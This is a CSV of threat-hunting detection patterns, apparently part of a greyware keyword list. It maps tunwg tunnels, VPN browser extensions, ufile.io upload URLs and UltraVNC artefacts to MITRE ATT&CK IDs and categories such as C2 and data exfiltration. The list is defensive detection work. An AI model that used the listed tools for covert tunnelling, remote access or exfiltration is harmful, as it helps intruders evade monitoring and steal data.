"*/tunwg.git*",".{0,1000}\/tunwg\.git.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","1","N/A","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z"
"*/tunwg@latest*",".{0,1000}\/tunwg\@latest.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","1","N/A","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z"
"*/tunwg-arm64.exe*",".{0,1000}\/tunwg\-arm64\.exe.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","1","N/A","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z"
"*\tunwg.exe*",".{0,1000}\\tunwg\.exe.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","N/A","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z"
"*\tunwg-arm64.exe*",".{0,1000}\\tunwg\-arm64\.exe.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","N/A","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z"
"*067fca2b141364d273b05e14a8f01d961d80d9599b8658a02a4f486510b9b89b*",".{0,1000}067fca2b141364d273b05e14a8f01d961d80d9599b8658a02a4f486510b9b89b.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","#filehash","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z"
"*0f1ccf4c5e7eada818bafad12e911a4d122a8329f7287ea0e4903ee1398e72f9*",".{0,1000}0f1ccf4c5e7eada818bafad12e911a4d122a8329f7287ea0e4903ee1398e72f9.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","#filehash","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z"
"*175c54eb22bc4eeb089586244b2863d53e14fbe8be999be5574901aa0a726744*",".{0,1000}175c54eb22bc4eeb089586244b2863d53e14fbe8be999be5574901aa0a726744.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","#filehash","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z"
"*2664814fc6bac015389cad412970cb6617f38a653f30585060c158f4d7963527*",".{0,1000}2664814fc6bac015389cad412970cb6617f38a653f30585060c158f4d7963527.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","#filehash","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z"
"*2cf91adccb7872c4e0526ac1b4c5d9ccb539dcd9f3c2c85daba0837fb2483e2b*",".{0,1000}2cf91adccb7872c4e0526ac1b4c5d9ccb539dcd9f3c2c85daba0837fb2483e2b.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","#filehash","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z"
"*3451e50cf07aa0e206cc3a632482276574f820542860187ffb8ec2221453a875*",".{0,1000}3451e50cf07aa0e206cc3a632482276574f820542860187ffb8ec2221453a875.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","#filehash","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z"
"*393d1d4e9992cbda5a9980c25d9d16890b18f276fc08a44c5855b3a14f4be894*",".{0,1000}393d1d4e9992cbda5a9980c25d9d16890b18f276fc08a44c5855b3a14f4be894.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","#filehash","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z"
"*3a52dc3df7ea98057fb163965ed3390702a95a57e8b4e5e263c7efeb83908577*",".{0,1000}3a52dc3df7ea98057fb163965ed3390702a95a57e8b4e5e263c7efeb83908577.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","#filehash","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z"
"*3bcd2aa02fed9aad200636add540ac159c082eb6058a9da45ed0dc7410713f38*",".{0,1000}3bcd2aa02fed9aad200636add540ac159c082eb6058a9da45ed0dc7410713f38.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","#filehash","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z"
"*574583d2e4b8f71d7aa57ed24c4015e37bdfe937bcd7f0d708f300eac9bc33e2*",".{0,1000}574583d2e4b8f71d7aa57ed24c4015e37bdfe937bcd7f0d708f300eac9bc33e2.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","#filehash","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z"
"*6d7d84fd5a11387aa706ed690f5855893594d5ded8ddeaf49cb449927c071f5f*",".{0,1000}6d7d84fd5a11387aa706ed690f5855893594d5ded8ddeaf49cb449927c071f5f.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","#filehash","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z"
"*72b86dc356b7f6708f1996cf2085fd66a75d05e04ab728c245db5d660f645281*",".{0,1000}72b86dc356b7f6708f1996cf2085fd66a75d05e04ab728c245db5d660f645281.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","#filehash","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z"
"*8d3cb4cbaa6643fd38caec3505f0541a56883504a65759e38e8a9e8764a5f4c7*",".{0,1000}8d3cb4cbaa6643fd38caec3505f0541a56883504a65759e38e8a9e8764a5f4c7.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","#filehash","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z"
"*9e66f8414c42c546b1d73672929a13285681ab0862f8ed9aa75d048dd5aa00e7*",".{0,1000}9e66f8414c42c546b1d73672929a13285681ab0862f8ed9aa75d048dd5aa00e7.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","#filehash","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z"
"*a8ea3cb39c602716d396076e7621a61e3df77e4e08377f33c6aebf4cc970f26c*",".{0,1000}a8ea3cb39c602716d396076e7621a61e3df77e4e08377f33c6aebf4cc970f26c.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","#filehash","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z"
"*b46ed003967f739acb4f0778b4665dc9aceab652c51223b10f632ab0681b7261*",".{0,1000}b46ed003967f739acb4f0778b4665dc9aceab652c51223b10f632ab0681b7261.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","#filehash","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z"
"*certs@tunwg.com*",".{0,1000}certs\@tunwg\.com.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","#email","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z"
"*d0d4347afb60b25e067af0d693c644b76560164c793304e35af765d023c14df6*",".{0,1000}d0d4347afb60b25e067af0d693c644b76560164c793304e35af765d023c14df6.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","#filehash","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z"
"*ddc7e4a39c307d93871a3198d2e888e697a0106b5ebc7002e9361d0f49ba2b21*",".{0,1000}ddc7e4a39c307d93871a3198d2e888e697a0106b5ebc7002e9361d0f49ba2b21.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","#filehash","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z"
"*e105000f9beb2d9659ead318f0f8a9a3acf90606024c5eef2fe11a4d140c4ee2*",".{0,1000}e105000f9beb2d9659ead318f0f8a9a3acf90606024c5eef2fe11a4d140c4ee2.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","#filehash","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z"
"*e750475e2594a84524d937f7ee405611f4237851d4a8d119f4d41b6127d2aa82*",".{0,1000}e750475e2594a84524d937f7ee405611f4237851d4a8d119f4d41b6127d2aa82.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","#filehash","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z"
"*ea46f4c9b2aacf0628d9410efe46c2a625eaf7a1b9a1a017e5547a5361062985*",".{0,1000}ea46f4c9b2aacf0628d9410efe46c2a625eaf7a1b9a1a017e5547a5361062985.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","#filehash","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z"
"*https://tunwg.com*",".{0,1000}https\:\/\/tunwg\.com.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","1","N/A","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z"
"*ntnj/tunwg*",".{0,1000}ntnj\/tunwg.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","1","N/A","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z"
"*tunwg --forward*",".{0,1000}tunwg\s\-\-forward.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","N/A","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z"
"*tunwg -p *",".{0,1000}tunwg\s\-p\s.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","N/A","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z"
"*tunwg*wireguard.go*",".{0,1000}tunwg.{0,1000}wireguard\.go.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","1","N/A","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z"
"*tunwg: initiating handshake to server*",".{0,1000}tunwg\:\sinitiating\shandshake\sto\sserver.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","N/A","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z"
"*TUNWG_IP=*",".{0,1000}TUNWG_IP\=.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","N/A","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z"
"*TUNWG_RELAY*",".{0,1000}TUNWG_RELAY.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","N/A","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z"
"*TUNWG_RUN_SERVER*",".{0,1000}TUNWG_RUN_SERVER.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","N/A","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z"
"*jliodmnojccaloajphkingdnpljdhdok*",".{0,1000}jliodmnojccaloajphkingdnpljdhdok.{0,1000}","greyware_tool_keyword","Turbo VPN for PC","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*https://store-*.ufile.io/v1/upload/*",".{0,1000}https\:\/\/store\-.{0,1000}\.ufile\.io\/v1\/upload\/.{0,1000}","greyware_tool_keyword","ufile.io","temporary file hosting service - abused by attackers to share informations with their victims","T1105 - T1071","TA0010 - TA0009","N/A","Hive","Data Exfiltration","https://ufile.io","1","1","N/A","uploading files url","10","10","N/A","N/A","N/A","N/A"
"*https://ufile.io/*",".{0,1000}https\:\/\/ufile\.io\/.{0,1000}","greyware_tool_keyword","ufile.io","temporary file hosting service - abused by attackers to share informations with their victims","T1105 - T1071","TA0010 - TA0009","N/A","Hive","Collection","https://ufile.io","1","1","N/A","downloading files url","5","6","N/A","N/A","N/A","N/A"
"*https://ufile.io/v1/upload/*",".{0,1000}https\:\/\/ufile\.io\/v1\/upload\/.{0,1000}","greyware_tool_keyword","ufile.io","temporary file hosting service - abused by attackers to share informations with their victims","T1105 - T1071","TA0010 - TA0009","N/A","Hive","Data Exfiltration","https://ufile.io","1","1","N/A","uploading files url","10","10","N/A","N/A","N/A","N/A"
"*mjnbclmflcpookeapghfhapeffmpodij*",".{0,1000}mjnbclmflcpookeapghfhapeffmpodij.{0,1000}","greyware_tool_keyword","Ultrareach VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"* start uvnc_service*",".{0,1000}\sstart\suvnc_service.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* stop uvnc_service*",".{0,1000}\sstop\suvnc_service.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* ultravnc.ini *",".{0,1000}\sultravnc\.ini\s.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* vnc.ini *",".{0,1000}\svnc\.ini\s.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*""publisher"":""uvnc bvba*",".{0,1000}\""publisher\""\:\""uvnc\sbvba.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","registry value","10","10","N/A","N/A","N/A","N/A"
"*/downloads/ultravnc.html*",".{0,1000}\/downloads\/ultravnc\.html.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\127.0.0.1-5900.vnc*",".{0,1000}\\127\.0\.0\.1\-5900\.vnc.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\AppData\Roaming\*-5900.vnc*",".{0,1000}\\AppData\\Roaming\\.{0,1000}\-5900\.vnc.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\AppData\Roaming\UltraVNC\*",".{0,1000}\\AppData\\Roaming\\UltraVNC\\.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\createpassword.exe*",".{0,1000}\\createpassword\.exe.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\CurrentVersion\Uninstall\Ultravnc2_is1\*",".{0,1000}\\CurrentVersion\\Uninstall\\Ultravnc2_is1\\.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","registry path","10","10","N/A","N/A","N/A","N/A"
"*\InventoryApplicationFile\ultravnc_*",".{0,1000}\\InventoryApplicationFile\\ultravnc_.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","registry path","10","10","N/A","N/A","N/A","N/A"
"*\options.vnc*",".{0,1000}\\options\.vnc.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","registry path","10","10","N/A","N/A","N/A","N/A"
"*\Services\EventLog\Application\UltraVNC\*",".{0,1000}\\Services\\EventLog\\Application\\UltraVNC\\.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","registry path","10","10","N/A","N/A","N/A","N/A"
"*\SOFTWARE\ORL\VNCHooks\Application_Prefs\WinVNC*",".{0,1000}\\SOFTWARE\\ORL\\VNCHooks\\Application_Prefs\\WinVNC.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","registry path","10","10","N/A","N/A","N/A","N/A"
"*\ultravnc.cer*",".{0,1000}\\ultravnc\.cer.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\UltraVNC.ini*",".{0,1000}\\UltraVNC\.ini.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\uvnc bvba\UltraVNC\*",".{0,1000}\\uvnc\sbvba\\UltraVNC\\.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\uvnc_launch.exe*",".{0,1000}\\uvnc_launch\.exe.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","registry path","10","10","N/A","N/A","N/A","N/A"
"*\uvnc_settings.ex*",".{0,1000}\\uvnc_settings\.ex.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","registry path","10","10","N/A","N/A","N/A","N/A"
"*\uvnc_settings.exe*",".{0,1000}\\uvnc_settings\.exe.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\uvnckeyboardhelper.exe*",".{0,1000}\\uvnckeyboardhelper\.exe.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\vncviewer.exe*",".{0,1000}\\vncviewer\.exe.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\winvnc.exe*",".{0,1000}\\winvnc\.exe.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\winvncsc.exe*",".{0,1000}\\winvncsc\.exe.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\winwvc.exe*",".{0,1000}\\winwvc\.exe.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*bvba_UltraVNC_*_exe*",".{0,1000}bvba_UltraVNC_.{0,1000}_exe.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*certutil.exe* -addstore ""TrustedPublisher""*ultravnc.cer*",".{0,1000}certutil\.exe.{0,1000}\s\-addstore\s\""TrustedPublisher\"".{0,1000}ultravnc\.cer.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*'Company'>UltraVNC</Data>*",".{0,1000}\'Company\'\>UltraVNC\<\/Data\>.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","#companyname","N/A","10","10","N/A","N/A","N/A","N/A"
"*'Description'>VNC server</Data>*",".{0,1000}\'Description\'\>VNC\sserver\<\/Data\>.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*firewall add allowedprogram *vncviewer.exe* ENABLE ALL*",".{0,1000}firewall\sadd\sallowedprogram\s.{0,1000}vncviewer\.exe.{0,1000}\sENABLE\sALL.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
